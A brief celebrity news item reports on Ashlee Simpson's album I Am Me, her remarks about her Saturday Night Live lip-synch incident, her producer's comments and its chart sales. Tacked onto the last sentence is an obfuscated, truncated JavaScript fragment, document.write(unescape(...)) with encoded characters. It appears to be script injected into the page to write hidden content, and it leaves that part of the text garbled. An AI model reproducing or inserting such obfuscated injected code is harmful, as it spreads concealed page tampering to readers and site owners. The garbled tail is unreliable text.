Despite the stigma of her Saturday Night Live lip-synch disaster Ashlee Simpson is still trucking on with the impending release of her new album I Am Me.
"Every artist that you loved has probably lip- synched once in their life" the born again blonde joked to reporters in New Jersey adding, "I'm human and I have imperfections."
Simpson told northjersey.com that this new album showcases an older, more mature her than the girl on The Ashlee Simpson Show which documented her experiences recording her first album.
Ashlee believes she has more creative control over the material and the overall direction on I Am Me.
"I wanted to make sure this record was about her voice" her producer John Shanks told reporters, "so people get to know more about her as an artist."
Ashlee Simpson's new album I Am Me is currently outselling Stevie Wonder's new release A Time To Love two to one in the American Billboard Charts.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
